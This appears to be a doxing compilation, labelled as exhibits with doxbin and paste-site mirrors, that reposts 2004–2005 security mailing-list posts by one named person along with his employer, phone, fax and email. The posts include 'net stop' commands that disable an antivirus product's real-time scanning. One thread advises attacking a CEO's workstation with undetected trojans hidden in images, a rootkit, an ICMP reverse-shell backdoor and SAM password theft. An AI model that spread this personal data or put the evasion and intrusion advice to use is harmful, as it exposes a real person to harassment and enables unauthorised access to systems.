1.936.00 Engine 7.100 for WinXP/2k/NT: The AV client is protected for unloading the Realtime Scan agent prompting for a password (which I don't know of course). Moreover I have NOT admin rights which allows me to perform a full system scan but not to unload the client and/or the realtime protection. Playing with the "net" command on a DOS prompt, I found out that the AV launches itself and the realtime prot as services automatically. Then I tried to stop the services with the simple command net stop "OfficeScanNT Listener" net stop "OfficeScanNT RealTime Scan" Guess what? The two services have been successfully stopped from my system. What do you guys think of this? Should I advise the AV Company of this or this is normal behaviour? Tnx for feedback. Ciao Marco Monicelli MARCEGAGLIA SPA Automotive Sales Department Stainless Steel Division Tel. +39 0376 685369 Fax. +39 0376 685625 email: ***@marcegaglia.com Seth Hall 17 years ago Permalink Marco, You don't have to be an administrator of the local machine to start and stop services. By default, members of the Power Users group have the ability to stop and start services on their local computer, which is probably what you are logged on as. Members of the Users group cannot, by default, stop and start services. I was able to stop my officescan service from a Power User account, but not from a User account (just checked to make sure Trend hadn't put in any proprietary settings). Your net admin should either not be giving out power user status or should be locking down services so that members of the Power Users group cant control their stop/start (which may or may not be possible). Trend is powerless against incorrect configuration, I'd imagine. /Seth Hall -----Original Message----- From: Marco Monicelli [mailto:***@marcegaglia.com] Sent: Wednesday, July 14, 2004 2:28 AM To: ***@securityfocus.com Subject: Trend Micro Officescan for Win2k strange behaviour Importance: High Hello List! I've noticed the following "weird" behaviour of the Trend Micro Officescan client vers. 5.58 update to pattern 1.936.00 Engine 7.100 for WinXP/2k/NT: The AV client is protected for unloading the Realtime Scan agent prompting for a password (which I don't know of course). Moreover I have NOT admin rights which allows me to perform a full system scan but not to unload the client and/or the realtime protection. Playing with the "net" command on a DOS prompt, I found out that the AV launches itself and the realtime prot as services automatically. Then I tried to stop the services with the simple command net stop "OfficeScanNT Listener" net stop "OfficeScanNT RealTime Scan" Guess what? The two services have been successfully stopped from my system. What do you guys think of this? Should I advise the AV Company of this or this is normal behaviour? Tnx for feedback. Ciao Marco Monicelli MARCEGAGLIA SPA Automotive Sales Department Stainless Steel Division Tel. +39 0376 685369 Fax. +39 0376 685625 email: ***@marcegaglia.com 3APA3A 17 years ago Permalink Dear Marco Monicelli, --Wednesday, July 14, 2004, 1:28:24 PM, you wrote to ***@securityfocus.com: MM> Playing with the "net" command on a DOS prompt, I found out that the AV ... MM> net stop "OfficeScanNT Listener" MM> net stop "OfficeScanNT RealTime Scan" It's bug of any automated system. It's documented as "Kiddie with elevated privileges can make any protection unusable". Windows is very vulnerable to this problem. -- ~/ZARAZA Ну а теперь, Уильям, хорошенько поразмыслите над данным письмом. (Твен) -------------------------------------------------------------------------------------------- Exhibit E: http://www.blacksheepnetworks.com/security/resources/pentest/6537.html (A continuance from Exhibit A) RE: Hacking to Xp box From: Marco Monicelli (marco.monicelli@marcegaglia.com) Date: Mon Sep 05 2005 - 13:46:15 EDT Next message: Dario Ciccarone (dciccaro): "RE: Nortel Contivity 2600" Previous message: Marco Ivaldi: "Re: Multiple Spoofed HTTP Requests" In reply to: Eduardo Suzuki: "RE: Hacking to Xp box" Next in thread: chad@mr-lew.com: "RE: Hacking to Xp box" Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ] Dear Eduardo/list, I didn't discuss the fact that a server is much more juicy to hit for an hacker than the simple workstation, even if it is the CEO box. Once stated this, we can proceed with the next point. First, SP2's firewall can by easily bypass as mostly firewalls with injection techinque. Infact they normally tend to allow HTTP traffic for example. If the firewall doesn't block ICMP, you can use some ICMP backdoor which replies to a special crafted packet ICMP ping with a reverse connect shell. If you get admin privilegies on that box, you can even think to stop the firewall service on that machine. If the RAW sockets limit is your problem, you can easily ENABLE back the raw sockets with some right command lines (google is your best friend once again). Regarding the JPG/GIF question, there are many joiner/merger on the net which are not recognized by AV and they can hide an EXE file inside the Picture. Once the guy opens the pic, then the EXE is excecuted hiddenly and secretly. I'm not taking into consideration the buffer overflow vulnerability as it is now a bit too old to be exploited (expecially on a fully patched machine). So the trick is just that a "not really expert" guy will prolly open a picture (curiosity helps hackers a lot) and get infected easily without exploiting any vulnerability. I call this "curiosity engeneering".... ehehehhehe.... HXDEF is correctly a rootkit which means you first have to get admin rights on the target box. I've suggested that in order to mention rootkits which can be useful to an hacker, once he got admin privilegies. Did you ever see this file "hxdef defeating modern detectors.rar"? It is a movie which shows how it is NOT detected by most of the rootkit's hunters. But maybe that movie is not updated and you're right (I couldn't test it unfortunately). Anyway, the main point to show the CEO the insecurity of the box is to get ADMIN privilegies over there. Then you can choose the game you wanna play on that computer. I'm opened to any further suggestion, tnx for yours Eduardo. Cheers Marco Hi, Marco! IMO, I think it's harder to attack a workstation compared to a server through a network, since servers must have some open port in listening state. On a workstation the user is the weakest point most of the time, while on a server there are many other parts to take into account. If there is a firewall in place (for example, the one that comes with XP SP2), which attacks are possible through a network? AFAIK just a few. Windows XP restricts most of the attacks that use anonymous connections. Service Pack 2 restricts even more. If you are a domain admin, there are many possibilities, but that's not the case here. What do you mean by "executing a jpg or a gif file"? I know there are buffer overflow vulnerabilities that can be exploited when opening an image, but it's not a trivial attack. I'm not sure (because I didn't try it), but I think it's even harder to do it when you need to merge an executable into an image using a joiner. I'd like to know what you think about it. Regarding the hxdef rootkit, you can find it out by using RootKitRevealer from SysInternals. It's available at http://www.sysinternals.com/Utilities/RootkitRevealer.html. BTW, hxdef isn't considered an attack tool. It's used after you successfully got access to a computer, when you want to hide files, open ports and so on. Just my $0.02. Regards, Eduardo Suzuki esuzuki_br@pop.com.br Eduardo.AC.Suzuki@gmail.com "The essential is invisible to the eyes." -----Original Message----- From: Marco Monicelli [mailto:marco.monicelli@marcegaglia.com] Sent: Friday, September 02, 2005 6:12 AM To: Juan B Cc: pen-test@securityfocus.com Subject: Re: Hacking to Xp box Importance: High Ciao juan! If the CEO box is fully patched and FW is enabled, then your mission is a little bit more difficult to accomplish. Besides, there are thousands of recent exploits for windows which you can try. For example, did you try the Universal exploit for the Plug and Play vulnerability? It is published everywhere. You can try with more recent exploits than the DCOM exploit which is at least 3 years old. If you want to try with the trojan, I would suggest you to google for Bifrost, which is a Remote Administration Tool (you can call it trojan if you prefer) that is completely UNDETECTED by any AV (at the moment it is still 100% undetected). You can pack it inside any file (exe, jpg, gif....) and it will be executed silently and hiddenly. Moreover, Bifrost can bypass firewalls injecting itself into Explorer.exe process. Another good UNDETECTED tool is hxdef rootkit. Arp poisoning could do the job but why not trying to steal the SAM file and to crack it? You can do that remotely if the machine has the ports you mentioned opened. I bet you know some tool to steal the SAM and to crack it. I love SAMDUMP for example. ;) Last but not least, you can try with a Denial of Service to show your CEO how easily a kid can prevent you from working with a simple DoS. Why not sniffing the network? There are many undetected sniffers around the Web. Just my 2 cents ;) Marco Hi Guys Please give me a hend here. Im trying to penetrate the CEO box to show him why we need better security in our company, he told me to show me how it can be done. he has xp pro sp 2 with all the pathches installed and FW enbled but I cant ! I tried to use metasploit with the ms rpc dcom exploit but it didnt worked. nessus found port 135 139 2000 and ntp are opened and also he can read some smb shares and also outputed that this host doesnt disgard SYN packets that have the FIN flag set. and port 2000 (callback is open). what I can try more to break this box? any ideas? I know I allways can try to arp poison his arp table and pass all the machines traffic throw my laptop to capture some passwords but this is enough. or send him a trojan but we have a good anti virus protection . Does some of you have Ideas ? Thanks a lot ! Juan __________________________________________________ Do You Yahoo!? Tired of spam? Yahoo! Mail has the best spam protection around http://mail.yahoo.com ---------------------------------------------------------------------------- -- Audit your website security with Acunetix Web Vulnerability Scanner: Hackers are concentrating their efforts on attacking applications on your website. Up to 75% of cyber attacks are launched on shopping carts, forms, login pages, dynamic content etc. Firewalls, SSL and locked-down servers are futile against web application hacking. Check your website for vulnerabilities to SQL injection, Cross site scripting and other web attacks before hackers do! Download Trial at: http://www.securityfocus.com/sponsor/pen-test_050831 ---------------------------------------------------------------------------- --- ---------------------------------------------------------------------------- -- Audit your website security with Acunetix Web Vulnerability Scanner: Hackers are concentrating their efforts on attacking applications on your website. Up to 75% of cyber attacks are launched on shopping carts, forms, login pages, dynamic content etc. Firewalls, SSL and locked-down servers are futile against web application hacking. Check your website for vulnerabilities to SQL injection, Cross site scripting and other web attacks before hackers do! Download Trial at: http://www.securityfocus.com/sponsor/pen-test_050831 ---------------------------------------------------------------------------- --- ------------------------------------------------------------------------------ Audit your website security with Acunetix Web Vulnerability Scanner: Hackers are concentrating their efforts on attacking applications on your website. Up to 75% of cyber attacks are launched on shopping carts, forms, login pages, dynamic content etc. Firewalls, SSL and locked-down servers are futile against web application hacking. Check your website for vulnerabilities to SQL injection, Cross site scripting and other web attacks before hackers do! Download Trial at: http://www.securityfocus.com/sponsor/pen-test_050831 ------------------------------------------------------------------------------- Exhibit F: https://marc.info/?l=bugtraq&m=108991985612069&w=2 [prev in list] [next in list] [prev in thread] [next in thread] List: bugtraq Subject: Trend Micro Officescan for Win2k strange behaviour From: Marco Monicelli Date: 2004-07-14 9:28:24 Message-ID: OFF477B9CD.96AC5FC0-ONC1256ED1.00334DA6-C1256ED1.00340A3A () marcegaglia ! com [Download RAW message or body] Hello List! I've noticed the following "weird" behaviour of the Trend Micro Officescan client vers. 5.58 update to pattern 1.936.00 Engine 7.100 for WinXP/2k/NT: The AV client is protected for unloading the Realtime Scan agent prompting for a password (which I don't know of course). Moreover I have NOT admin rights which allows me to perform a full system scan but not to unload the client and/or the realtime protection. Playing with the "net" command on a DOS prompt, I found out that the AV launches itself and the realtime prot as services automatically. Then I tried to stop the services with the simple command net stop "OfficeScanNT Listener" net stop "OfficeScanNT RealTime Scan" Guess what? The two services have been successfully stopped from my system. What do you guys think of this? Should I advise the AV Company of this or this is normal behaviour? Tnx for feedback. Ciao Marco Monicelli MARCEGAGLIA SPA Automotive Sales Department Stainless Steel Division Tel. +39 0376 685369 Fax. +39 0376 685625 email: marco.monicelli@marcegaglia.com [prev in list] [next in list] [prev in thread] [next in thread] ---------------------------------------------------------------- Mirrors: https://doxbin.org/user/LarpKillaz https://controlc.com/0b2e78bb https://skidbin.net/paste/Ug45GeKjMF https://ghostbin.com/paste/eQ8LT End of Log ----------------------------------------------------------------------------- ~BWA~ "The House Always Wins"